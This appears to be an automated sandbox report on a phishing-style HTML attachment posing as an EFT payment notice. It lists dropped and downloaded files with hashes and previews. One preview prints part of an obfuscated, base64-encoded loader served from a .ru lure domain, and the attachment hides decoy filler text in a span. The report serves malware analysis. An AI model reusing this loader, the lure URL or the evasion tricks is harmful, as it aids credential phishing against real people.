                          Preview:L..................F.@.. ...$+.,......v.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............ y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:40:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2675
                          Entropy (8bit):4.000197283674341
                          Encrypted:false
                          SSDEEP:
                          MD5:5C1A0E4BEAFA55C7026483F8BEF9AF5F
                          SHA1:2356DC122335771A1C3737006460950C2ACF72CA
                          SHA-256:EE2877DB7ECF339DC75DEB91D741919C749EDB4869CF63CA12A219002BDF4577
                          SHA-512:3EB532D8BB34440DD42AD49A7A1E4FCE7559EEAD9BB03676FBF0A439966C0D56E3B19A5E4AFA63973D3A546D90AAABF4DA1EE0AEFC7600A7304AA470636B5A62
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,......v.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............ y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2689
                          Entropy (8bit):4.007841855962057
                          Encrypted:false
                          SSDEEP:
                          MD5:8D31FD66D70D4FC627832E41BF22F26A
                          SHA1:58AF84C239554340F97B16B19DFD718704E5939E
                          SHA-256:2CEDAD7ED39212439EF62657F36F03165DA56493E15CF820AEE309E668896010
                          SHA-512:81A99D8DDD3BE8FFAFD6AF07AF88524DA7B07BFE7CCB84CAD74B6C1BC0C3684BDE0443BCB0B1919DB955D57AB36B06F39A88D90259603FB27276BD8D30324E09
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............ y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:40:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.9948965430911914
                          Encrypted:false
                          SSDEEP:
                          MD5:869452F0D30E360406997BC2CE8C3897
                          SHA1:5C5AF2A0924775D3FBC38EC505311CA73CB3D414
                          SHA-256:86C9DA112BE733CF5B6F99CFE941085D46DDB2317CAA1249918F0B241D079EA8
                          SHA-512:03E50C4C54B12951D53737833F8E163652F69E8F80D10BEDECEABCB7015BBB628CCFB3432896F3407218D5C0AE44A21CF5C97810575CC61310465DA641B2A6D8
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.....\.v.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............ y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:40:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2677
                          Entropy (8bit):3.9874349086127983
                          Encrypted:false
                          SSDEEP:
                          MD5:8540097098D4DD1F7810A073CD1C30AC
                          SHA1:B4EEF1CFBF445CA7D286B2EEAA33CCBEE97A5D71
                          SHA-256:5379BF0F2873927CB590D3F8B9239F8665C76A59BCF4CCB6AAFC601BF5950A4F
                          SHA-512:DD05ADA23064139D3AC83E2C04AB100AD7B9E14131322A9B1DB2E8C4012D823CC191504379792EB424C0C681C539C48418FA7A066C211AC0AC7977121BB0649C
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,.......v.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............ y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Jan 14 16:40:55 2025, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                          Category:dropped
                          Size (bytes):2679
                          Entropy (8bit):3.9973344795955246
                          Encrypted:false
                          SSDEEP:
                          MD5:9BAFF8FEEE9F67828C599DE2D7E4F171
                          SHA1:2F705F70C7E631362C3372C9837229C06C70B4FD
                          SHA-256:428DB8D5F95EDCAD31C888298E75E1B32C5FDFE2982F7D30105E068E6582C1F3
                          SHA-512:CFB605E9812B16E8FE8A85D9974246FFB07E8B23647AACDB3539E43DC3D9DD3880E87066533F370111555BDC644FD3B227A348139551ED1590AA4A21B5AD56D0
                          Malicious:false
                          Reputation:unknown
                          Preview:L..................F.@.. ...$+.,......v.f..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Z......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Z......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Z......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Z............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Z.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............ y......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (65447)
                          Category:dropped
                          Size (bytes):89501
                          Entropy (8bit):5.289893677458563
                          Encrypted:false
                          SSDEEP:
                          MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                          SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                          SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                          SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                          Malicious:false
                          Reputation:unknown
                          Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:HTML document, ASCII text, with very long lines (7489), with CRLF line terminators
                          Category:downloaded
                          Size (bytes):19776
                          Entropy (8bit):5.87876303863459
                          Encrypted:false
                          SSDEEP:
                          MD5:4C9BEF260E5B1B25778CC9409D5C9C9A
                          SHA1:F7C721E48494403EA123E8029F7FEEF475373BE6
                          SHA-256:7DB09ACB1353FC90EAE78C0FB2B1F7415634853F3788CE8A25F31BEE50330554
                          SHA-512:6470DB5D2157E3390C82CEEAAE61E05F3352F33AF29CC1A449D2C04C463133E9A689E48ED9458FB8C190BED8DF00F364C063FC1A389FA0E9CFA5C2940C0E2761
                          Malicious:false
                          Reputation:unknown
                          URL:https://l9y1.yordickyel.ru/16E/
                          Preview:<script>../* Do not be embarrassed by your failures, learn from them and start again. */..if(atob("aHR0cHM6Ly9sOVkxLnlvcmRpY2t5ZWwucnUvMTZFLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGh
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (48316), with no line terminators
                          Category:downloaded
                          Size (bytes):48316
                          Entropy (8bit):5.6346993394709
                          Encrypted:false
                          SSDEEP:
                          MD5:2CA03AD87885AB983541092B87ADB299
                          SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                          SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                          SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                          Malicious:false
                          Reputation:unknown
                          URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:ASCII text, with very long lines (47520)
                          Category:dropped
                          Size (bytes):47521
                          Entropy (8bit):5.3981340461317835
                          Encrypted:false
                          SSDEEP:
                          MD5:7C92EC9D1395055CE0405A32607C7291
                          SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                          SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                          SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                          Malicious:false
                          Reputation:unknown
                          Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                          Category:dropped
                          Size (bytes):61
                          Entropy (8bit):3.990210155325004
                          Encrypted:false
                          SSDEEP:
                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                          Malicious:false
                          Reputation:unknown
                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142534
                          Category:dropped
                          Size (bytes):49954
                          Entropy (8bit):7.99493321471063
                          Encrypted:true
                          SSDEEP:
                          MD5:E16AC075AC754DBD1CF969508220E30D
                          SHA1:69A91FF7A1C044231D6D28B4DD4C6AD3D34F2A50
                          SHA-256:E8AC3DCEF9E67CC776542A40C71B719D41668DF41D294C1A49A5AD23C5A5B5EC
                          SHA-512:12C4E6E5BD999E7BF431DCA707DA4BB5193D2795DD139DCAFC38CAFA757A88F75068D3F2821840068247B9F6CFB55178EF223CDB3349444E622EA4A8E69700A6
                          Malicious:false
                          Reputation:unknown
                          Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                          File Type:PNG image data, 100 x 83, 8-bit/color RGB, non-interlaced
                          Category:downloaded
                          Size (bytes):61
                          Entropy (8bit):4.068159130770307
                          Encrypted:false
                          SSDEEP:
                          MD5:0B346623768E853ABACD46B39E6D7F59
                          SHA1:0810637D19B47C1A0FD5D467D74B76A28856E723
                          SHA-256:08341F269EF18E297A2B0B6834A3B66FD099CEF3808C5A47F75E180337EE2D89
                          SHA-512:72CBB1D47F3FE01EB0201CEADC2AB25A0B68B1A159747B4E1D8EF5E5F14CCC372C92A4FD56FEC823C4978444F963ACB8B45BB58F67B4AFA748D07348E6695223
                          Malicious:false
                          Reputation:unknown
                          URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/901f6a04794f4313/1736876459360/payAaVpSPLz3R6u
                          Preview:.PNG........IHDR...d...S.......5.....IDAT.....$.....IEND.B`.
                          File type:HTML document, ASCII text, with very long lines (1605), with CRLF line terminators
                          Entropy (8bit):5.343939770332945
                          TrID:
                          • HyperText Markup Language (12001/1) 29.26%
                          • HyperText Markup Language (12001/1) 29.26%
                          • HyperText Markup Language (11001/1) 26.83%
                          • HyperText Markup Language (6006/1) 14.65%
                          File name:EFT_Payment_Notification_Gheenirrigation.html
                          File size:2'267 bytes
                          MD5:d75342c879f7c2ceb6aa59cfe6b5e744
                          SHA1:2de570a9f80fb769d5cbf35a84bff863b6b558c3
                          SHA256:2e85dd387130ff6c4ff3afa282d76e04be636551c4a7b029dd74108708f71f38
                          SHA512:85c1e062c5f3c70387f46022639454d62bf052e5f275eb8c9b8e6819fcdb2ab2cb8ade67e2825236035bc8fc89fad74487b6a172b8a7fb46716b0cbf05daa166
                          SSDEEP:48:2xcb7btvAaSvr5lA3H8H94MXtIP79YdzY98qRN:2WhALNlAK94M9mKPqX
                          TLSH:7A41FDB5ADBFD33DD697E73CA932D2D21C2F964B01981188FC0B41C71585A6876D2371
                          File Content Preview:<html>.. <head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. </head>.. <body>.. <span hidden>The child played with building blocks.</span>.. </bod
                          Icon Hash:173149cccc490307